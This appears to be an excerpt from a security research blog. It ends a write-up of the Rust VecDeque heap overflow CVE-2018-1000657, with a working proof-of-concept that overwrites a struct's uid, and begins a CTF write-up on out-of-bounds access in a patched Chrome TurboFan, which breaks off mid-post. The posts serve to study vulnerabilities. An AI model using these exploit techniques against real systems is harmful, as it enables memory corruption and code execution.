<span class="w"> </span><span class="c1">// [o o o o o . o o ]</span>
<span class="w"> </span><span class="c1">// H T</span>
<span class="w"> </span><span class="c1">// C [o o o o o . . . . . . . . . o o ]</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// A</span>
<span class="w"> </span><span class="c1">// Nop</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">old_cap</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// B</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">copy_nonoverlapping</span><span class="p">(</span><span class="n">old_cap</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="p">);</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="n">old_cap</span><span class="p">;</span>
<span class="w"> </span><span class="fm">debug_assert!</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// C</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">new_tail</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new_cap</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="n">old_cap</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">copy_nonoverlapping</span><span class="p">(</span><span class="n">new_tail</span><span class="p">,</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="p">,</span><span class="w"> </span><span class="n">old_cap</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new_tail</span><span class="p">;</span>
<span class="w"> </span><span class="fm">debug_assert!</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="fm">debug_assert!</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">head</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">cap</span><span class="p">());</span>
<span class="w"> </span><span class="fm">debug_assert!</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tail</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="bp">self</span><span class="p">.</span><span class="n">cap</span><span class="p">());</span>
<span class="w"> </span><span class="fm">debug_assert!</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cap</span><span class="p">().</span><span class="n">count_ones</span><span class="p">()</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p><code>VecDeque::handle_cap_increase()</code> may move the prefix or the suffix of the buffer to handle the change of the internal buffer size. Case B (the prefix is shorter than the suffix) copies the prefix of the buffer to <code>old_cap</code> position and moves <code>head</code> pointer. This leads to out-of-bound write and pointer corruption when <code>new_cap</code> is equal to <code>old_cap</code>. The <code>head</code> pointer is not wrapped to the size of the internal buffer, so invoking <code>VecDeque::push_back()</code> will allow one additional element to overflow. Overall, this vulnerability allows an attacker to overflow at most N/2 elements, where N is the size of the internal buffer before calling <code>VecDeque::reserve()</code>.</p>
<h2>Proof of Concept</h2>
<p>In this section, we present a PoC attack against the vulnerability. The code is written entirely in safe Rust, but the content of an immutable struct is being changed due to the heap overflow.</p>
<p>According to the CVE report, Rust version from 1.3.0 to 1.21.0 are affected by this bug. However, version 1.21.0 seems not to be affected by this error in our experiment, so we targeted version 1.20.0. This code expects <a href="http://jemalloc.net/">jemalloc</a> heap allocator since it was the default heap allocator of Rust on Linux at that time, but it would be straightforward to adapt this code to glibc malloc and use one of <a href="https://github.com/shellphish/how2heap">glibc heap exploitation techniques</a>. We tested our PoC code with <code>1.20.0-x86_64-unknown-linux-gnu</code> toolchain.</p>
<div class="highlight"><pre><span></span><code><span class="k">use</span><span class="w"> </span><span class="n">std</span><span class="p">::</span><span class="n">mem</span><span class="p">::</span><span class="n">size_of</span><span class="p">;</span>
<span class="k">use</span><span class="w"> </span><span class="n">std</span><span class="p">::</span><span class="n">collections</span><span class="p">::</span><span class="n">VecDeque</span><span class="p">;</span>
<span class="cp">#[derive(Debug)]</span>
<span class="k">struct</span><span class="w"> </span><span class="nc">User</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">uid</span><span class="p">:</span><span class="w"> </span><span class="kt">usize</span><span class="p">,</span>
<span class="w"> </span><span class="n">gid</span><span class="p">:</span><span class="w"> </span><span class="kt">usize</span><span class="p">,</span>
<span class="w"> </span><span class="n">name</span><span class="p">:</span><span class="w"> </span><span class="kp">&</span><span class="o">'</span><span class="nb">static</span><span class="w"> </span><span class="kt">str</span><span class="p">,</span>
<span class="p">}</span>
<span class="k">fn</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// VecDeque allocates internal buffer on the heap</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="k">mut</span><span class="w"> </span><span class="n">deque</span><span class="p">:</span><span class="w"> </span><span class="nc">VecDeque</span><span class="o"><</span><span class="kt">i32</span><span class="o">></span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VecDeque</span><span class="p">::</span><span class="n">with_capacity</span><span class="p">(</span><span class="mi">7</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// We allocate a new user on the heap using Box</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">user_box</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">Box</span><span class="p">::</span><span class="n">new</span><span class="p">(</span><span class="n">User</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">uid</span><span class="p">:</span><span class="w"> </span><span class="mi">1000</span><span class="p">,</span>
<span class="w"> </span><span class="n">gid</span><span class="p">:</span><span class="w"> </span><span class="mi">1000</span><span class="p">,</span>
<span class="w"> </span><span class="n">name</span><span class="p">:</span><span class="w"> </span><span class="s">"User"</span><span class="p">,</span>
<span class="w"> </span><span class="p">});</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">old_cap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">capacity</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">buf_size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">old_cap</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">size_of</span><span class="p">::</span><span class="o"><</span><span class="kt">i32</span><span class="o">></span><span class="p">();</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">user_size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">size_of</span><span class="p">::</span><span class="o"><</span><span class="n">User</span><span class="o">></span><span class="p">();</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"Deque internal buffer capacity: {}"</span><span class="p">,</span><span class="w"> </span><span class="n">old_cap</span><span class="p">);</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"Deque internal buffer size: {}"</span><span class="p">,</span><span class="w"> </span><span class="n">buf_size</span><span class="p">);</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"User struct size: {}"</span><span class="p">,</span><span class="w"> </span><span class="n">user_size</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// jemalloc will put VecDeque internal buffer and User struct close if their size matches</span>
<span class="w"> </span><span class="fm">assert!</span><span class="p">(</span><span class="n">buf_size</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">user_size</span><span class="p">);</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"Current user: {:?}"</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">user_box</span><span class="p">);</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">buf_addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">as_slices</span><span class="p">().</span><span class="mf">0.</span><span class="n">as_ptr</span><span class="p">()</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="kt">usize</span><span class="p">;</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">user_addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">user_box</span><span class="p">.</span><span class="n">as_ref</span><span class="p">()</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">*</span><span class="k">const</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="kt">usize</span><span class="p">;</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"VecDeque buffer at: 0x{:08x}"</span><span class="p">,</span><span class="w"> </span><span class="n">buf_addr</span><span class="p">);</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"User struct at: 0x{:08x}"</span><span class="p">,</span><span class="w"> </span><span class="n">user_addr</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// check if they were actually allocated next to each other</span>
<span class="w"> </span><span class="fm">assert!</span><span class="p">(</span><span class="n">user_addr</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">buf_addr</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">buf_size</span><span class="p">);</span>
<span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">push_front</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">push_front</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// this will copy 0 to internal_buffer[len] position (lower 4 bytes of uid)</span>
<span class="w"> </span><span class="c1">// it also corrupts the ring buffer head pointer to point len + 1 position</span>
<span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">reserve</span><span class="p">(</span><span class="mi">4</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// this will write 0 to internal_buffer[len + 1] position (upper 4 bytes of uid)</span>
<span class="w"> </span><span class="n">deque</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// uid of immutable user variable was overwritten at this point</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"Overwritten user: {:?}"</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">user_box</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">user_box</span><span class="p">.</span><span class="n">uid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"You are root!"</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="fm">println!</span><span class="p">(</span><span class="s">"You don't have the root permission"</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>The code prints this result when executed. We can observe that the content of the immutable struct <code>user_box</code> has changed.</p>
<div class="highlight"><pre><span></span><code>Deque internal buffer capacity: 8
Deque internal buffer size: 32
User struct size: 32
Current user: User { uid: 1000, gid: 1000, name: "User" }
VecDeque buffer at: 0x7fb2e8421060
User struct at: 0x7fb2e8421080
Overwritten user: User { uid: 0, gid: 1000, name: "User" }
You are root!
</code></pre></div>
<h2>Conclusion</h2>
<p><em>Bug Fix.</em> This CVE is particularly interesting because it is a memory
safety error but the bug was in the <em>safe</em> part of the Rust.
The root cause of this bug is safe code breaking unsafe code's invariant <code>new_cap > old_cap</code>,
even though the corruption of the internal pointer indeed happened in
an unsafe function <code>VecDeque::handle_cap_increase()</code>. The bug was
fixed by changing <code>self.capacity()</code> (user-facing capacity) to
<code>old_cap</code> (internal buffer capacity).</p>
<p><img alt="Bug fix in Rust Git repository" src="/blog/cve-2018-1000657.assets/fix.png"></p>
<p><em>Memory safety vs. logic bugs.</em>
Should we consider this is a memory-safety bug or a logic bug?
It is questionable
as the actual mistake is an incorrect checking of the capacity:
perhaps, a typo or a naive mistake
thanks to the opaque names of two variables, <code>old_cap</code> vs <code>capacity()</code>.
If the same mechanism and logic are implemented in pure Rust,
it still incurs an incorrect use (or overwriting)
of another nearby element in the deque,
although it might prevent attackers
from constructing a more powerful exploit primitive
such as arbitrary read/write,
in a generic manner.</p>
<p><em>Conclusion.</em>
Rust guides programmers to double-check the consequences of unsafe Rust code by explicit <code>unsafe</code> keyword, because a bug related to unsafe code can break Rust's safety guarantee. However, our observation suggests that Rust codes that can trigger a memory bug are actually more than codes that are explicitly marked as unsafe. Rust programmers should be also careful when they are writing safe Rust codes that can affect the invariant of the unsafe codes, and investigating and quantifying this kinds of indirect unsafe Rust code would be an interesting future research topic.</p>Exploiting TurboFan Through Bounds Check Elimination2019-07-14T00:00:00+02:002019-07-14T00:00:00+02:00Hanqing Zhaotag:gts3.org,2019-07-14:/2019/turbofan-BCE-exploit.html<p>Exploiting TurboFan Through Bounds Check Elimination</p><h3>TL;DR</h3>
<p>A few days ago, we played a CTF that has an interesting Chrome exploitation challenge.
The author of the challenge applied a deliberate and vulnerable patch to the latest chromium running with a <code>--no-sandbox</code> flag.</p>
<p>To get the flag, we must use this bug to achieve remote code execution (RCE) in the web process. Utimately, we first turn this bug into an array off-by-one bug through bounds check elimination (BCE). Then we manipulate the heap to get stable <code>addrOf</code> and <code>fakeObj</code> primitives. Finally, we use this bug to spawn a calculator on <code>Ubuntu 18.04</code> successfully.</p>
<h3>The Customized Patch & Bug</h3>
<div class="highlight"><pre><span></span><code><span class="n">diff</span><span class="w"> </span><span class="o">--</span><span class="n">git</span><span class="w"> </span><span class="n">a</span><span class="o">/</span><span class="n">src</span><span class="o">/</span><span class="n">compiler</span><span class="o">/</span><span class="n">machine</span><span class="o">-</span><span class="k">operator</span><span class="o">-</span><span class="n">reducer</span><span class="p">.</span><span class="n">cc</span><span class="w"> </span><span class="n">b</span><span class="o">/</span><span class="n">src</span><span class="o">/</span><span class="n">compiler</span><span class="o">/</span><span class="n">machine</span><span class="o">-</span><span class="k">operator</span><span class="o">-</span><span class="n">reducer</span><span class="p">.</span><span class="n">cc</span>
<span class="n">index</span><span class="w"> </span><span class="n">a6a8e87cf4</span><span class="p">.</span><span class="mf">.164</span><span class="n">ab44fab</span><span class="w"> </span><span class="mi">100644</span>
<span class="o">---</span><span class="w"> </span><span class="n">a</span><span class="o">/</span><span class="n">src</span><span class="o">/</span><span class="n">compiler</span><span class="o">/</span><span class="n">machine</span><span class="o">-</span><span class="k">operator</span><span class="o">-</span><span class="n">reducer</span><span class="p">.</span><span class="n">cc</span>
<span class="o">+++</span><span class="w"> </span><span class="n">b</span><span class="o">/</span><span class="n">src</span><span class="o">/</span><span class="n">compiler</span><span class="o">/</span><span class="n">machine</span><span class="o">-</span><span class="k">operator</span><span class="o">-</span><span class="n">reducer</span><span class="p">.</span><span class="n">cc</span>
<span class="err">@@</span><span class="w"> </span><span class="mi">-291</span><span class="p">,</span><span class="mi">7</span><span class="w"> </span><span class="o">+</span><span class="mi">291</span><span class="p">,</span><span class="mi">7</span><span class="w"> </span><span class="err">@@</span><span class="w"> </span><span class="n">Reduction</span><span class="w"> </span><span class="n">MachineOperatorReducer</span><span class="o">::</span><span class="n">Reduce</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span><span class="w"> </span><span class="n">node</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">left</span><span class="p">().</span><span class="n">Is</span><span class="p">(</span><span class="n">kMaxUInt32</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ReplaceBool</span><span class="p">(</span><span class="nb">false</span><span class="p">);</span><span class="w"> </span><span class="c1">// M < x => false</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">right</span><span class="p">().</span><span class="n">Is</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ReplaceBool</span><span class="p">(</span><span class="nb">false</span><span class="p">);</span><span class="w"> </span><span class="c1">// x < 0 => false</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">IsFoldable</span><span class="p">())</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// K < K => K</span>
<span class="o">-</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ReplaceBool</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">left</span><span class="p">().</span><span class="n">Value</span><span class="p">()</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">m</span><span class="p">.</span><span class="n">right</span><span class="p">().</span><span class="n">Value</span><span class="p">());</span>
<span class="o">+</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ReplaceBool</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">left</span><span class="p">().</span><span class="n">Value</span><span class="p">()</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">m</span><span class="p">.</span><span class="n">right</span><span class="p">().</span><span class="n">Value</span><span class="p">()</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">LeftEqualsRight</span><span class="p">())</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ReplaceBool</span><span class="p">(</span><span class="nb">false</span><span class="p">);</span><span class="w"> </span><span class="c1">// x < x => false</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">left</span><span class="p">().</span><span class="n">IsWord32Sar</span><span class="p">()</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">m</span><span class="p">.</span><span class="n">right</span><span class="p">().</span><span class="n">HasValue</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
</code></pre></div>
<p>The patch is interesting because it only use two characters. The bug exists in the <a href="https://cs.chromium.org/chromium/src/v8/src/compiler/machine-operator-reducer.cc?g=0&l=289"><code>MachineOperatorReducer</code></a> phase, a very late optimization phase.</p>
<p>The IR <code>kUint32LessThan</code> is used to compare two <code>uint32</code> numbers. In this phase (<code>MachineOperatorReducer</code>), the compiler tries to fold some deterministic comparisons. e.g., for any $\theta$, $kMaxUint32 < \theta$ is folded into $False$. Also, for any comparison between constants, the expression is folded into a determinitic <code>boolean</code> value. e.g., $4 < 4$ is folded into $False$.</p>
<p>The patch introduces a mistable in the fold operation. When the compiler trying to fold the expression, it adds $1$ to the right value, resulting in some correct folds. e.g., $4 < 4$ ($False$) is treated as $4 < 5$ , generating a wrong result: $True$.</p>
<p>Intuitively, this bug can not be leveraged to trigger memory corruption directly; and thus, we tries to use this bug to get some stronger primitives.</p>
<h3>Bounds Check Elimination</h3>
<p>Previously, there are several <code>typer</code> bugs have been exploited by eliminating the bounds check when accessing JS arraies. Therefore, we would like investigate if the bug can be exploited through similar approaches.</p>
<p>However, Chromium has decided to disable this optimization to <a href="https://bugs.chromium.org/p/v8/issues/detail?id=8806">harden</a> turbofan's bounds check against typer bugs in <code>Simplified lowering</code> phase. </p>
<p>Fortunately, we noticed that there are still some samilar bugs could be exploited. e.g., the <code>String#lastIndexOf</code> bug depicted by Jeremy Fetiveau<sup id="fnref:0"><a class="footnote-ref" href="#fn:0">1</a></sup>. As this blog indicates, we notice that the BCE hardening can be bypassed.</p>
<h3>Finding a path to eliminate the bounds check</h3>
<p>To boost our analysis, we use <code>--trace-turbo</code> flag and <code>turbolizer</code> of <code>d8</code> to check the <code>Sea of Nodes</code> IR generated by TurboFan<sup id="fnref:1"><a class="footnote-ref" href="#fn:1">2</a></sup>.</p>
<p>To date, although the <code>simplified lowering</code> phase does not remove the <code>CheckBounds</code> node, it is replaced by a <code>CheckedUint32Bounds</code> node (<a href="https://cs.chromium.org/chromium/src/v8/src/compiler/simplified-lowering.cc?g=0&l=1602">source codes</a>). In this way, in the <code>Effect Control Linearization</code> phase, The <code>CheckedUint32Bounds</code> is replaced by a <code>Uint32LessThan</code> node. According to result of uint32 comparison, generating a <code>LoadElement</code> node or an <code>Unreachable</code> node (<a href="https://cs.chromium.org/chromium/src/v8/src/compiler/effect-control-linearizer.cc?g=0&l=2376">source codes</a>).</p>
<p>e.g., for the following codes,</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">opt</span><span class="p">(){</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">arr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="mf">0</span><span class="p">,</span><span class="w"> </span><span class="mf">1</span><span class="p">,</span><span class="w"> </span><span class="mf">2</span><span class="p">,</span><span class="w"> </span><span class="mf">3</span><span class="p">];</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">idx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">3</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">arr</span><span class="p">[</span><span class="nx">idx</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span><span class="w"> </span><span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mh">0x10000</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="p">)</span>
<span class="w"> </span><span class="nx">opt</span><span class="p">()</span>
<span class="kd">var</span><span class="w"> </span><span class="nx">x</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">opt</span><span class="p">()</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">x</span><span class="p">)</span>
<span class="c1">// output</span>
<span class="nx">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">d8</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">test</span><span class="p">.</span><span class="nx">js</span>
<span class="nx">$</span><span class="w"> </span><span class="mf">3</span>
</code></pre></div>
<p>the compiler generates this graph. It works and eliminates the bounds check correctly.</p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/zZ54bXf.png">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>The procedure to eliminate the bounds check</i></div>
</center>
<p><br></p>
<p>Because $(3 < 4)\equiv True$, without any bounds check, the function loads elements directly.</p>
<p>Right now, the idea to exploit it is quite clear: using the wrong result generated by <code>Uint32LessThan</code> to eliminate the bounds check, constructing an OOB array.</p>
<h3>Constant Folding and Two ways to bypass it</h3>
<p>Now we would like have the very first try, expecting the element acccess is out-of-bounds (OOB).</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">opt</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">arr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="mf">0</span><span class="p">,</span><span class="w"> </span><span class="mf">1</span><span class="p">,</span><span class="w"> </span><span class="mf">2</span><span class="p">,</span><span class="w"> </span><span class="mf">3</span><span class="p">];</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">idx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">4</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">arr</span><span class="p">[</span><span class="nx">idx</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="c1">// output</span>
<span class="nx">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">d8</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">test</span><span class="p">.</span><span class="nx">js</span>
<span class="nx">$</span><span class="w"> </span><span class="kc">undefined</span>
</code></pre></div>
<p>Unfortunately, this code snippet cannot result in OOB acccess.</p>
<p>After some investigation, we noticed that the <code>LoadElement</code> node is disappeared. </p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/oItsY8e.png" width = "1200">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>The LoadElement node has disappeared</i></div>
</center>
<p><br></p>
<p>Suddenly, we realized that the variable <code>idx</code> is removed by the constant folding in <code>LoadElimination</code> phase<sup id="fnref:2"><a class="footnote-ref" href="#fn:2">3</a></sup>. Hence the <code>LoadElement</code> node is disappeared.</p>
<p>To avoid the constant folding, we need to assign an indeterministic <code>Range</code> to the <code>CheckBounds</code> node.
Therefore, we can apply some arithmetical operations to this variable.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">opt</span><span class="p">(){</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">arr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="mf">1.1</span><span class="p">,</span><span class="w"> </span><span class="mf">2</span><span class="p">,</span><span class="w"> </span><span class="mf">3</span><span class="p">,</span><span class="w"> </span><span class="mf">5</span><span class="p">]</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">idx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">4</span><span class="p">;</span>
<span class="w"> </span><span class="nx">idx</span><span class="w"> </span><span class="o">&=</span><span class="w"> </span><span class="mh">0xfff</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">arr</span><span class="p">[</span><span class="nx">idx</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="c1">// output</span>
<span class="nx">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">d8</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">test</span><span class="p">.</span><span class="nx">js</span>
<span class="nx">$</span><span class="w"> </span><span class="mf">8.714350797546e-311</span>
</code></pre></div>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/RMzBo0z.png" width = "400">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>The constant folding has been bypassed</i></div>
</center>
<p><br></p>
<p>Cool! It works, the array accessed an OOB element successfuly! Technically, we can use it to fulfill our exploitation right now.
However, personally I prefer another elegant approach: Escape Analysis.</p>
<h3>Escape Analysis</h3>
<p>Escape analysis is an optimization phase that can be used to remove temporary objects.
e.g., because object "o" is unescaped, the temprary object "o" in the following codes is removed through the escape analysis optimization. </p>
<div class="highlight"><pre><span></span><code><span class="c1">// before escape analysis</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">foo</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">o</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="nx">x</span><span class="o">:</span><span class="w"> </span><span class="mf">1</span><span class="p">,</span><span class="w"> </span><span class="nx">y</span><span class="o">:</span><span class="mf">2</span><span class="p">};</span>
